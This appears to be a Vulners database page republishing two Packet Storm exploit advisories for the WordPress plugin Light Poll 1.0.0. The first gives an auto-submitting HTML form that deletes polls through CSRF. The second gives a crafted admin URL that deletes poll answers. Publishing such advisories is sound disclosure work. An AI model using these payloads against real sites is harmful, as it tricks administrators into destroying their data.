Lucene search
K

WordPress Light Poll 1.0.0 Cross Site Request Forgery

🗓️ 13 Aug 2024 00:00:00Reported by Vuln Seeker Cybersecurity TeamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 260 Views

Plugin Light Poll 1.0.0 CSRF Vulnerabilities in Polls Deletion and Poll Answers Deletio

Code
`# Exploit Title: Light Poll <= 1.0.0 - Polls Deletion via CSRF  
# Date: 05-04-2024  
# Exploit Author: Vuln Seeker Cybersecurity Team  
# Vendor Homepage: https://wordpress.org/plugins/light-poll/  
# Version: <=1.0.0  
# Tested on: Firefox  
# Contact me: [email protected]  
  
Description  
  
The plugin does not have CSRF checks when deleting polls, which could allow  
attackers to make logged in users perform such action via a CSRF attack  
  
Proof of Concept  
  
<html>  
<body>  
<form action="http://localhost/wp-admin/admin.php">  
<input type="hidden" name="page" value="lp_settings" />  
<input type="hidden" name="task" value="remove" />  
<input type="hidden" name="id" value="1" />  
<input type="submit" value="Submit request" />  
</form>  
<script>  
history.pushState('', '', '/');  
document.forms[0].submit();  
</script>  
</body>  
</html>  
  
Reference:  
https://wpscan.com/vulnerability/d598eabd-a87a-4e3e-be46-a5c5cc3f130e/  
  
  
  
  
# Exploit Title: Light Poll <= 1.0.0 - Poll Answers Deletion via CSRF  
# Date: 05-04-2024  
# Exploit Author: Vuln Seeker Cybersecurity Team  
# Vendor Homepage: https://wordpress.org/plugins/light-poll/  
# Version: <=1.0.0  
# Tested on: Firefox  
# Contact me: [email protected]  
  
Description  
  
The plugin does not have CSRF checks in some places, which could allow  
attackers to make logged in users perform unwanted actions via CSRF attacks  
  
Proof of Concept  
  
Where <<POLL_ID>> and <<ANSWER_ID>> are valid:  
  
https://example.com/wp-admin/admin.php?page=poll_settings&task=remove_answer&id=  
<<POLL_ID>>&answer_id=<<ANSWER_ID>>  
  
Reference:  
https://wpscan.com/vulnerability/d1449be1-ae85-46f4-b5ba-390d25b87723/  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4
260